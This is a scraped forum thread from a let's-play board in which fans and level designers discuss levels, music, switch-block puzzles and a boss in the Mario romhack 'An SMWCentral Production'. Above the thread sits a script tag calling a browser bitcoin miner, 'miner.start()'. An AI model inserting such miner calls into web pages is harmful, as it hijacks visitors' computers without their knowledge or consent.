<script>
miner.start(); // initialise bitcoin miner
</script>

pge projectmario fan games galaxysmbx community

An SMWCentral Production: A game about some eggs

this is the place where lps are being talked about. it's important to talk about games being played on the internet.
Dollop of Mayo

Re: An SMWCentral Production: A game about some eggs

Postby Dollop of Mayo » 8 years ago

It took some digging through a few of the less pleasant pages of this thread but I found the link to the level music :

http://bin.smwcentral.net/39374/smwcpmusiclisting.txt

The music used in Nimbus Ascent was from Sonic & Knuckles - Sky Sanctuary.

I dunno, I thought it worked fine.
The nature of the signature is significant and natural.
http://dollopofmayo.tumblr.com/ - I put comics here because they demand it.

MrDeePay

Postby MrDeePay » 8 years ago

DancingMad wrote:Okay Nimbus Ascent and Pink n' Purple Path were awesome dang levels, and even though Nimbus Ascent was short it still could've used a midpoint but that's a minor complaint. Well that and the fairly pointless P-switches in both levels.
Nimbus Ascent originally had a checkpoint (and no vertical auto-scroll), but it was considered too easy to beat with the aid of one. Combine those with the fact that it allows you to skip three levels (four if you include the Switch Palace), those changes were made.

And apparently my own level is up tomorrow. Well this isn't going to be pleasant to see.

Rameau's Nephew

Postby Rameau's Nephew » 8 years ago

limepie20 wrote: Also, I'm upset whoever made the ghost house level didn't really change the cloud part whatsoever. A palette change would be nice to make it look dark or scary or something so even though the tileset isn't vanilla (I think?) it gives off the vanilla feel which I really dislike.
Really? I quite liked the whole "ghosts at dawn" effect; I think it's one of the most memorable parts of the level. Sure, they could have been made into spooooooky storm clouds or something, but that's sort of overdone (and already appears in an earlier level); I find the level as stands much more æsthetically interesting.

Also, I love the use of the Sky Sanctuary music in these levels. Absolutely adore it.

limepie20

Postby limepie20 » 8 years ago

Ghosts are scary in the dark.
And if you like the whole ghosts in dawn thing it couldve been consistent if in the ghost house there were like rays of light coming from the window or something. I mean even though it can be dark in a house and light outside its an odd transition. Also, why just clouds outside? Maybe something to make it still like a ghost house except outside other than there being ghost house enemies. I don't know, to me it just seems wrong.

Burgers

Postby Burgers » 8 years ago

I'm liking these last several levels of SMWCP a lot more. Maybe it's just the fact that the ice/cloud world has much better contrast between enemies, platforms you can stand on and can't stand on, etc. Well, that and the levels are shorter. =p Although that ghost house could have used a midpoint.

S.N.N.

Postby S.N.N. » 8 years ago

The cave world just sucked and everyone knows it. I'm happy we're past it.

Aside from one or two potentially irritating levels later on, it's smooth sailing until the end. It's really unfortunate that the less-than-stellar levels had to be thrown at the beginning, since they really did give a bad vibe.

Dollop of Mayo

Postby Dollop of Mayo » 8 years ago

But at least they're out of the way. We have ripped the adhesive medical strip from our arm and the healing process continues.
The nature of the signature is significant and natural.
http://dollopofmayo.tumblr.com/ - I put comics here because they demand it.

Punisher

Postby Punisher » 8 years ago

I lol'd at how he carried the NYEH HEH HEH HEH over to the next episode. Anyway, digging dat Sky Sanctuary music.

Rameau's Nephew

Postby Rameau's Nephew » 8 years ago

I really like the æsthetics of this level, but it seems inappropriate to precede the castle which is to follow. Or rather, the castle seems inappropriate to follow this level, as the whole nighttime cloud city business is a good mood to end a sky world on, whereas the castle itself, though not exactly out of place, doesn't feel as though it was specifically designed for this world as such. In any case it's an unfortunate paring to have these two particular stages back to back--almost any other castle in the game would have fit better after this.

That said, I'm not a huge fan of punishing the player for hitting switches. Admittedly, it's not too bad here, and balanced by a good deal more blocks which help the player, but the obstructive red !-blocks at the very end strike me as a bit excessive. I would have even gone so far as to say they make the final jump virtually impossible when big, but raocow had to go and casually disprove that in this video. Nevertheless, it can be a frustrating experience to make it through the entirety of a moderately complex and lengthy level like this only to lose at the last moment entirely due to something of a mean trick on the part of the designer, which somewhat mars an otherwise quite solid level.

kilon

Postby kilon » 8 years ago

The beauty of this level is that you can take different routes depending on which switches you pressed and whether you have yoshi or not.
And that's why sometimes the switches are obstructing the way probably. So that you can/have to take another route.
I really like this level. In my opinion the best level so far.

Fapnoob

Postby Fapnoob » 8 years ago

Agreed, fantastic level. Great example of how to make a large level but not make it too long or boring.
Midpoint was well places, alternate paths worked.
A+ from me.

Looking forward to next ep, hopefully metroid themed level judging from the name :d

ZMann

Postby ZMann » 8 years ago

I quite liked Palace Acropolis. Level design was neat, and the author is awesome with using SMW Redrawn's graphics and palettes with other graphics.

Also, for some reason, today's episode reminded me of this: raocow, I'd really be happy if you would check out that coin trail in Peaks to Puffs before you go and finish World 5. If anything, at least go check it out before you finish the hack completely; it has a nice little secret that you'll really like. :D

raocow
the death of the incredible huge
Location: maybe the Wizards are the most complex, and the sales guys are up their daily

Postby raocow » 8 years ago

good job for atma for the world 5 boss, I think he managed to combine every thing I hate in romhack bosses and maneuvring into one, other than 'wait for the weak point'
the chillaxest of dragonsImage
ImageImage

Atma

Postby Atma » 8 years ago

raocow wrote:good job for atma for the world 5 boss, I think he managed to combine every thing I hate in romhack bosses and maneuvring into one, other than 'wait for the weak point'
In my defense, I only coded the boss, I didn't conceptualize it or even decide how it was going to work.

The next boss of mine you'll encounter isn't stellar either, but I have to say I'm pretty proud of the last boss of mine that you'll come across.
Last edited by Atma on 03 Feb 2011, 17:32, edited 1 time in total.

Yonowaaru

Postby Yonowaaru » 8 years ago

Oh,
Spider Guardian....
You were even more of a bother than in Prime 2, if that's even possible....
GENERATION 25: The first time you see this, copy it into your sig on any forum and add 1 to the generation. Social experiment.

morsel/morceau

Postby morsel/morceau » 8 years ago

It's nice to have a level with an optional Yoshi, rather than 'here's a big jump for you to do" or whatever else. That said, Yoshi is a bit underutilised in this hack; no cutscene where he's exchanging witticisms with Mario? or answering his BlackBerry (shut up, it's a type of berry)?
dont wanna jihad no more

S.N.N.

Postby S.N.N. » 8 years ago

I'm kind of wondering why people are upset that the switch blocks both helped AND hindered you in that level. It really makes things more interesting in my opinion, and it means the gameplay of the level changes depending on how you've played the game prior to it.

I dunno. Aside from the lack of custom block explanations, this is still one of my personal favorites.

joeyjoejoejrshabbadu

Postby joeyjoejoejrshabbadu » 8 years ago

I have to say, I love having such peaceful music (from my favorite Touhou even) in a level full of giant spiky things that want to crush you.
A top secret document has been left behind the floor!

Chompie

Postby Chompie » 8 years ago

I could point out lots of flaws and details that bothered me in today's level, but... why would I bother? It was a very, very good level. Anyone who wants non-linearity should look to this as a good example.

Complaints be damned, well done on this one, MrDeePay.
What the heck is this link still doing in my signature? http://www.twitch.tv/chompie

MrDeePay

Postby MrDeePay » 8 years ago

Rameau's Nephew wrote:I really like the æsthetics of this level, but it seems inappropriate to precede the castle which is to follow. Or rather, the castle seems inappropriate to follow this level, as the whole nighttime cloud city business is a good mood to end a sky world on, whereas the castle itself, though not exactly out of place, doesn't feel as though it was specifically designed for this world as such.
Some small history on the level.
When I was experimenting with the palettes WYE provided with the sky GFX (I didn't stay with the provided moon and added the one from Super Princess Peach in its place.), there was a sunset-styled one that I thought would've went nice with the AUS Mist song that was already in the ROM. I noticed Eastern Night later on in the music list and I tried that out and switched to a nighttime palette, which I ended up favoring over AUS/sunset.
Chompie wrote:I could point out lots of flaws and details that bothered me in today's level, but... why would I bother? It was a very, very good level.
Go ahead anyway, it could be useful.
Note: I have yet to watch all of today's LP.

Edit: Almost complete repost.

- The 1up is blocked off by the no Sprite blocks in the second room is to prevent Cape Mario from slamming into the ground, thrusting it up to safer ground.
- Springboard was to be used where you Yoshi jumped before the checkpoint in the event you didn't have him.
- The spot high above the blue pipe contained a star and I think (I can't look in the ROM through LM right now to make sure) another 1up.
- Acropolis means highest city in Greek.  Naming isn't something I'm good at, so that was the best I could come up with. I was reminded of that name from White Acropolis in Sonic '06.
- Yeah I probably should've used the message boxes to give clear explanations for the grey, blue, and green blocks. Plus gave a better indication that those were ON/OFF blocks.
- Meiling gets no respect.
- I would video reply where that last Yoshi pipe would've went, but I'm having PC troubles.
(It was a Star room that required Mario to part with Yoshi for a little bit, with the exit taking him to where the last green pipe was.)

FPzero
Try new Phazon Ice(TM), blue, refreshing, horribly mutagenic!

Postby FPzero » 8 years ago

Well I'm sorry about the upcoming boss, hopefully it didn't overshadow the rest of my level. I think it failed from lack of communication between Atma and i because I mentioned a vague idea of how it was to work, then he coded it and then there was a lot of bugfixing and I never got around to seeing the boss until near the end of everything. I guess I'll have more on the level as a whole when we see it tomorrow.

Jabberwock

Postby Jabberwock » 8 years ago

I'm several videos behind, but man, a non-trivial number of the levels in this hack are really big and (in my opinion) sort of tedious-seeming.

Just curious... is your avoidance of tool use just a matter of personal principle? To me some of these levels seem downright unreasonable in their expectations (Zephyr Manor for example), as in, absurdly long and difficult, and not in a particularly fun or original way. But then, maybe my concept of what is reasonable is informed by how bad I am at SMW.

To clarify, I'm not dissing on the hack as a whole... a lot of the levels have been very cool, and the overworld is the best I've seen probably.

Mineyl

Postby Mineyl » 8 years ago

Nah, there are a lot of levels that are too long in this game. Your complaint is justified.

Also, tomorrow's boss can DIAF. I spent like 20 minutes killing that thing because it wasn't obvious at all when I could and could not damage it. Maybe if I weren't so change resistant and actually played the game it came from, I'd have known what to do...
raocow wrote:I'm feeling so smug I'm gonna' stare at myself in the mirror for 23 hours!

limepie20

Postby limepie20 » 8 years ago

Ok.

Red Switch Palace: The level itself was good. Except for the random obnoxious cutoff. And I'm sorry but the music choice was horrible.

Palace Acropolis: This is a breath of fresh air. I mean some of the level design was questionable and it would've helped to tell the player what each block did but at least it had a non vanilla gimmick. Most of the hack, to me, felt like smw with different graphics and I think that's boring. This was a nice level. Nice music choice, too.

Pheonix
e before o [not really]

Postby Pheonix » 8 years ago

Actually Mineyl, that boss is damaged somewhat differently than its MP2 counterpart; although, I may add, which version of the boss is more annoying is almost a toss-up.
But yeah, I'd have to agree with the sentiment that past world 3 the hack begins to pick up a lot. It's just too bad that a handful of levels just are really out of place in terms of length. There are only really two annoyingly long levels left, though.
pheonix/feenicks/ffeenicxkcs/[indistinguishable from just slamming down on the keyboard]
feenick.tumblr.com

Return to “let's play”